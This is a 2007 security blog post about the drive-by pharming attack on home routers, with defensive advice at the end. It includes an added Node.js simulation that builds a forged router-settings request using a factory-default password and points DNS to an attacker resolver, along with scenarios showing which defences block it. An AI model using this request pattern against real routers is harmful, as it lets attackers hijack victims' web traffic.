Friday, February 23, 2007

Drive-by Pharming Alert

It has recently hit the news that researchers at Symantec and Indiana University have put together a clever and potentially devastating pharming attack aimed at consumer-grade wireless routers. All that's required for a router to be "drive-by pharmed" is for a user connected behind that router to visit a specially crafted malicious web page.

First, the attacker creates a web page containing a small piece of malicious JavaScript. When the page is viewed, the code sends requests to the user's home broadband router (typically at a LAN address such as 192.168.1.1), logs in with the router's factory-default administrator password, and then submits the router's own settings form to change its DNS server entries to point at an attacker-controlled DNS server. Because the requests come from the victim's browser inside the LAN, it doesn't matter that the router's admin interface isn't reachable from the Internet. The router hands out its DNS servers to machines on the LAN via DHCP, so once a machine renews its lease (at reboot, when the lease expires, or on a manual renew) its future DNS requests are made to, and resolved by, the attacker's DNS server.

And then the attacker basically owns the victim's web connection.

In other words, once the attack has done its work, any browser on your network can be silently redirected to any site (legitimate or otherwise) that the attacker wishes, because the attacker's resolver decides which address every hostname maps to. The browser or OS you happen to be using doesn't matter.
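The exchange described above, as an added example that is not part of the original post or of the Symantec/Indiana University research: a small Node.js model of a router's web admin endpoint, the forged request a malicious page would send to it, and the DHCP option a LAN client receives on its next lease renewal. The gateway address, form handler path (`apply.cgi`), field names and the factory-default password `admin` are assumptions chosen to resemble a typical device; the DNS addresses are constructed from documentation ranges. The Referer check in the third scenario is a hardening a vendor could add, not something the post says the affected routers do.

```javascript
// Added example, not code from the original post or the researchers.
// Models a consumer router's admin interface plus the forged request a
// malicious page would send. Gateway IP, handler path, field names and the
// default password are assumptions; addresses are constructed (RFC 5737 ranges).

const DEFAULT_PASSWORD = "admin";      // assumed factory default
const ATTACKER_DNS = "203.0.113.53";   // constructed attacker resolver

function basicAuth(user, password) {
  return "Basic " + Buffer.from(`${user}:${password}`).toString("base64");
}

// The evil page's side: guess the gateway, embed the default credentials
// (the browser sends them as HTTP Basic auth) and POST the settings form.
// A cross-site POST carries the attacker's page as Referer, not the router.
function buildForgedRequest(gatewayIp, user, password, newDns) {
  return {
    method: "POST",
    url: `http://${gatewayIp}/apply.cgi`,          // assumed handler path
    headers: { Authorization: basicAuth(user, password),
               Referer: "http://evil.example/" },
    body: { dns1: newDns, dns2: newDns, action: "apply" },
  };
}

// The router's side: a minimal model of the admin endpoint. Returns an
// HTTP-style status plus the (possibly updated) configuration. With
// opts.checkReferer it also refuses state changes not initiated from a page
// served by the router itself, a hardening the vulnerable devices lacked.
function routerApplyHandler(config, req, opts = {}) {
  if (req.headers.Authorization !== basicAuth(config.adminUser, config.adminPassword)) {
    return { status: 401, config };                // wrong or missing password
  }
  if (opts.checkReferer) {
    const own = `http://${config.lanIp}/`;
    if (!(req.headers.Referer || "").startsWith(own)) {
      return { status: 403, config };              // cross-site request refused
    }
  }
  return { status: 200, config: { ...config, dns: [req.body.dns1, req.body.dns2] } };
}

// DHCP side: the DNS servers a LAN client is told to use when its lease
// renews. Until that renewal the client keeps whatever it had before.
function dhcpDnsOption(config) {
  return config.dns.slice();
}

function freshRouter(password) {
  return { lanIp: "192.168.1.1", adminUser: "admin", adminPassword: password,
           dns: ["198.51.100.1", "198.51.100.2"] };   // ISP resolvers, constructed
}

// Scenario 1: factory password, no Referer check -> DNS silently replaced.
function scenarioDefaultPassword() {
  const router = freshRouter(DEFAULT_PASSWORD);
  const req = buildForgedRequest(router.lanIp, "admin", DEFAULT_PASSWORD, ATTACKER_DNS);
  return routerApplyHandler(router, req);
}

// Scenario 2: the owner changed the password -> the guessed login fails.
function scenarioChangedPassword() {
  const router = freshRouter("correct horse battery staple");
  const req = buildForgedRequest(router.lanIp, "admin", DEFAULT_PASSWORD, ATTACKER_DNS);
  return routerApplyHandler(router, req);
}

// Scenario 3: factory password, but the router checks Referer.
function scenarioRefererCheck() {
  const router = freshRouter(DEFAULT_PASSWORD);
  const req = buildForgedRequest(router.lanIp, "admin", DEFAULT_PASSWORD, ATTACKER_DNS);
  return routerApplyHandler(router, req, { checkReferer: true });
}

function demo() {
  for (const s of [scenarioDefaultPassword, scenarioChangedPassword, scenarioRefererCheck]) {
    const r = s();
    console.log(`${s.name}: HTTP ${r.status}, DNS now ${dhcpDnsOption(r.config).join(", ")}`);
  }
}

demo();
```

A real malicious page would issue the request with a hidden form or an `<img>` tag rather than calling a function, but the ingredients are the same: a guessable gateway address, a guessable password, and a browser that will happily send both from inside the LAN. Only the first scenario changes the resolvers; the victim sees nothing, and every client picks up the attacker's servers the next time it renews its lease.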

Apparently there are at least 77 Cisco devices that are vulnerable to this (for now) proof-of-concept attack. Symantec has a nice article detailing the mechanics of the attack, as well as a Flash video for those who don't feel like reading. Suffice it to say, it would be a very bad thing for this attack to start cropping up in the wild. However, there are some simple and relatively easy steps that everyone can take to protect themselves.

  • Change your router's password. The attack only works because the router still accepts its factory-default login, so this is the one step that actually removes the vulnerability. There is no excuse not to. Seriously. One caveat: routers that use HTTP Basic auth get their credentials re-sent automatically by the browser for the rest of the browser session, so close the browser after you finish administering the router rather than leaving a tab open.
  • Browse with scripting disabled. And since JavaScript is needed for many legitimate uses, solutions like the NoScript Extension for Firefox are worth investigating.
  • Don't browse recklessly. Yes, I know those shady corners of the Internet are loads of fun, but they aren't worth getting your computer "totally pwned". Just be careful and use some common sense when clicking around.
Via Schneier.


